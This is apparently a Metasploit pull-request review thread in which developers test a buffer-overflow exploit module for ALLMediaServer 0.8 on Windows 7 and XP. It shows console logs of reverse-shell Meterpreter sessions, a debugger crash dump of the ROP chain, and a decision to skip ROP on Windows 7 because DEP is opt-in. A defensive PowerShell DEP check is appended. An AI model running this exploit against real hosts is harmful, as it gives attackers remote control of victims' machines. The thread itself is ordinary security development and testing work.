Review of pull request #606 #607
Tested, and worked. Sorry, I must have slept away. Thanks anyway.
Hi, I'm sorry for the late follow-up. This exploit works on my W7 SP1 on my VM, then I tested on another machine, and the exploit doesn't work. I tried mine also, and it works. The operating system is still the same, latest update from MS. Here is the dump of this exploit (#607):

and here is mine (#606):

msf exploit(allmediaserver_bof) > exploit
[*] Started reverse handler on 10.10.10.2:4444
meterpreter > sysinfo
OS Version:
C:\Users\lab>
Hi modpr0be,

Today I'll do new tests on W7 SP1 over VirtualBox and VMware fresh virtual machines. If we cannot confirm exploit reliability on W7 SP1 with ROP between virtual/physical machines, maybe we'll need to avoid ROP on W7. Since W7 is OptIn by default, it could be acceptable :) I'll update with results along the day.

Hi jvazquez,

OK. Thanks for this. Will do the same test on a VMware fresh install. Cheers.
Hi modpr0be,

Working on a VMware virtual machine:

msf exploit(allmediaserver_bof) > set target 1
target => 1
msf exploit(allmediaserver_bof) > set RHOST 192.168.1.137
RHOST => 192.168.1.137
msf exploit(allmediaserver_bof) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.157:4444
[*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows 7 SP1 - English...
[*] Sending stage (752128 bytes) to 192.168.1.137
[*] Meterpreter session 3 opened (192.168.1.157:4444 -> 192.168.1.137:49161) at 2012-07-15 15:50:19 +0200
meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter > sysinfo
Computer : WIN-RNJ7NBRK9L7
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter >

But failing on a VirtualBox:

msf exploit(allmediaserver_bof) > set target 1
target => 1
msf exploit(allmediaserver_bof) > set RHOST 192.168.1.132
RHOST => 192.168.1.132
msf exploit(allmediaserver_bof) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.157:4444
[*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows 7 SP1 - English...
msf exploit(allmediaserver_bof) >

The crash on the VirtualBox virtual machine:

(ee8.e5c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=019bfd2c ebx=00000000 ecx=00000000 edx=6f62b418 esi=019bfd2c edi=019bfd1c
eip=00407cc0 esp=019bf8d4 ebp=019bfd40 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
MediaServer+0x7cc0:
00407cc0 8b4af8 mov ecx,dword ptr [edx-8] ds:0023:6f62b410=????????
0:006> !exchain
019bf8e8: MediaServer+13444a (0053444a)
019bfd48: *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\ALLMediaServer\avcodec-53.dll -
avcodec_53!avpriv_aac_parse_header+104c (65ec74dc)
Invalid exception stack at 539706eb
0:006> bp 65ec74dc
0:006> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=65ec74dc edx=778071cd esi=00000000 edi=00000000
eip=65ec74dc esp=019bf4ec ebp=019bf50c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
avcodec_53!avpriv_aac_parse_header+0x104c:
65ec74dc 81c4cc060000 add esp,6CCh
0:006> dd esp + 6cc
019bfbb8 685e8d55 68493408 8031b335 ca8f7708
019bfbc8 0c14b8b8 f37724b7 40434832 4b8492c6
019bfbd8 033d6df7 31974de7 adab911c 9a071121
019bfbe8 09ee7219 654cd442 e7a89d96 50921f67
019bfbf8 e3acef0d 8215297c 02b3a9ca 3a4fdf3b
019bfc08 2acfa068 7aef339a 7923567b 438d7853
019bfc18 ba89a0cf 05fd5780 d2aed9e9 b49a9229
019bfc28 0f14e825 0e6522a3 3dc44977 6df0dd54
0:006> dd esp + 6cc - 150
019bfa68 665a0aa1 665a0aa1 665a0aa1 665a0aa1
019bfa78 665a0aa1 665a0aa1 665a0aa1 665a0aa1
019bfa88 665a0aa1 665a0aa1 665a0aa1 65f6faa7
019bfa98 671ee4e0 6ac1ccb4 667ceedf 70476972
019bfaa8 65f5f09d 65f9830d 6ac1c1d5 00000600
019bfab8 6672a1e2 00000040 665a09df 6ad58a3d
019bfac8 6ac7a771 665a0aa1 6682f9f4 90909090
019bfad8 663dcbd2 00026fe9 53b8ca00 70102cef

Ugly :\ Performing more testing....
Avoiding the ROP exploit makes it work on W7 even on VirtualBox:

msf exploit(allmediaserver_bof_no_rop) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.157:4444
[*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows 7 SP1 - English...
[*] Sending stage (752128 bytes) to 192.168.1.132
[*] Meterpreter session 4 opened (192.168.1.157:4444 -> 192.168.1.132:49221) at 2012-07-15 16:28:40 +0200
meterpreter > sysinfo
Computer : JUAN-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a Sun VirtualBox Virtual Machine
meterpreter >

Now checking if the exploit with ROP is reliable across different virtual machines with Windows XP SP3. I'm thinking of avoiding the ROP exploit in the case of W7... anyway it's OptOut and Allmediaserver runs without DEP by default.

Tested successfully with ROP on VirtualBox:

msf exploit(allmediaserver_bof) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.157:4444
[*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows XP SP3 - English...
[*] Sending stage (752128 bytes) to 192.168.1.133
[*] Meterpreter session 5 opened (192.168.1.157:4444 -> 192.168.1.133:1097) at 2012-07-15 16:35:53 +0200
meterpreter > sysinfo
Computer : HOME-DF26FC7444
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a Sun VirtualBox Virtual Machine
meterpreter >

I'm going to send a new pull request, avoiding ROP in the case of W7, and asking a more experienced developer to agree with the decision :)
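The comments above turn on one point: the non-ROP payload only works because the default Windows 7 DEP policy does not cover an application that never opts in. A defender-side check for that condition, added here as an example and not code from the pull request or the thread; it assumes the server's image name is MediaServer (taken from the module name in the crash dump) and that it runs elevated on the same 32-bit Windows 7 host.

```powershell
# Added example (not from the pull request): report the system-wide DEP policy and
# whether the ALLMediaServer process actually runs with DEP, which decides whether a
# payload placed on the stack could execute without ROP. Run elevated. Uses
# Get-WmiObject rather than Get-CimInstance so it also works on the PowerShell 2.0
# that Windows 7 ships with.

$os = Get-WmiObject -Class Win32_OperatingSystem
$policyNames = @{ 0 = 'AlwaysOff'; 1 = 'AlwaysOn'; 2 = 'OptIn'; 3 = 'OptOut' }
$policy = [int]$os.DataExecutionPrevention_SupportPolicy
"System DEP policy: {0} ({1}); hardware NX available: {2}" -f $policy, $policyNames[$policy], $os.DataExecutionPrevention_Available
if ($policy -eq 0 -or $policy -eq 2) {
    # Under AlwaysOff/OptIn, applications that never opt in run with an executable
    # stack. Remediation (takes effect after a reboot):
    #   bcdedit /set {current} nx AlwaysOn
    Write-Warning 'Non-opted-in 32-bit applications run without DEP on this host.'
}

# P/Invoke GetProcessDEPPolicy from kernel32. It only answers for 32-bit processes,
# which matches the x86 Windows 7 target discussed in the thread.
$signature = @'
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool GetProcessDEPPolicy(IntPtr hProcess, out uint lpFlags, out bool lpPermanent);
'@
$kernel32 = Add-Type -MemberDefinition $signature -Name 'DepQuery' -Namespace 'Win32' -PassThru

$imageName = 'MediaServer'   # assumption: image name of ALLMediaServer, from the crash dump's module name
$PROCESS_DEP_ENABLE = 1      # flag bit reported in lpFlags when DEP is on for the process
foreach ($proc in Get-Process -Name $imageName -ErrorAction SilentlyContinue) {
    $flags = [uint32]0
    $permanent = $false
    if ($kernel32::GetProcessDEPPolicy($proc.Handle, [ref]$flags, [ref]$permanent)) {
        $state = $(if ($flags -band $PROCESS_DEP_ENABLE) { 'enabled' } else { 'DISABLED' })
        $perm  = $(if ($permanent) { ', permanent' } else { '' })
        "{0} (PID {1}): DEP {2}{3}" -f $proc.ProcessName, $proc.Id, $state, $perm
    } else {
        $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
        "{0} (PID {1}): GetProcessDEPPolicy failed, Win32 error {2}" -f $proc.ProcessName, $proc.Id, $err
    }
}
```

A process reporting "DEP DISABLED" while the policy is OptIn is exactly the state the non-ROP module relies on; switching the policy to AlwaysOn removes it for every process on the host.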
Well, avoiding ROP should be OK then. I have time now, I just finished work; I'll try the test again.

Hi modpr0be,

Feel free to test pull request #608 as a patch for the W7 situation until a reliable ROP version is built! I'm going to ask a more experienced developer to check. In the meanwhile, trying to build a ROP chain that is reliable between environments could be nice, maybe prepending a lot of ROP NOPs before the ROP chain.
Changes: